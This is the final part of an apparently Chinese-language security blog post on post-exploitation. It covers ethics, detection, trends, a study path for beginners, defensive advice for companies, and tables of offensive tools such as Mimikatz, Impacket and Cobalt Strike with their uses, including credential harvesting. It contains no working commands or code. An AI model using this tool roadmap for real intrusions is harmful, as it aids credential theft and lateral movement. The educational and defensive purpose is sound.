- 不破坏生产数据
- 不安装真实后门
- 模拟攻击而非真实攻击

**问题 2：如何检测后渗透攻击？**

防御建议：
- 监控异常登录
- 检测凭证转储行为
- 监控横向移动
- 部署 EDR 解决方案

**问题 3：后渗透技术的演进趋势？**

我认为：
- 无文件攻击增加
- 云环境后渗透
- 容器逃逸技术
- AI 辅助攻击

### 实战建议

**给新手的建议**：

```
1. 搭建实验环境
   - Active Directory 实验环境
   - 多台虚拟机
   - 网络隔离

2. 学习基础
   - Windows/Linux 系统原理
   - 网络协议
   - Kerberos 认证

3. 掌握工具
   - Metasploit（精通）
   - Mimikatz（熟悉）
   - BloodHound（熟悉）

4. 持续练习
   - HackTheBox
   - TryHackMe
   - 自建实验环境
```

**给企业的建议**：

```
1. 加强监控
   - 部署 SIEM
   - 监控异常行为
   - 建立基线

2. 最小权限
   - 实施最小权限原则
   - 定期审查权限
   - 分离管理账户

3. 多层防御
   - 网络分段
   - 终端防护
   - 身份验证

4. 定期演练
   - 红队演练
   - 应急响应演练
   - 安全意识培训
```

---

## 参考资料

### 学习资源

| 资源 | 类型 | 链接 |
|------|------|------|
| **Metasploit 文档** | 文档 | https://docs.metasploit.com |
| **BloodHound 文档** | 文档 | https://bloodhound.readthedocs.io |
| **ATT&CK 框架** | 知识库 | https://attack.mitre.org |
| **Red Team Notes** | 笔记 | https://www.ired.team |

### 工具资源

| 工具 | 官网 | 用途 |
|------|------|------|
| **Metasploit** | https://metasploit.com | 渗透框架 |
| **Mimikatz** | GitHub | 凭证收集 |
| **Impacket** | GitHub | 横向移动 |
| **BloodHound** | GitHub | 域分析 |
| **PowerSploit** | GitHub | PowerShell 工具 |
| **Empire** | GitHub | 后渗透框架 |
| **Cobalt Strike** | https://cobaltstrike.com | 红队平台 |

### 书籍推荐

| 书名 | 作者 | 难度 |
|------|------|------|
| 《Red Team Development and Operations》 | Joe Vest | 进阶 |
| 《Advanced Penetration Testing》 | Wil Allsopp | 高级 |
| 《The Red Team Field Manual》 | Ben Clark | 参考 |
| 《Blue Team Handbook》 | Don Murdoch | 防御 |

---

*365 天信息安全技术系列 | Day 216 | 后渗透攻击技术详解 | 字数：约 24,000 字*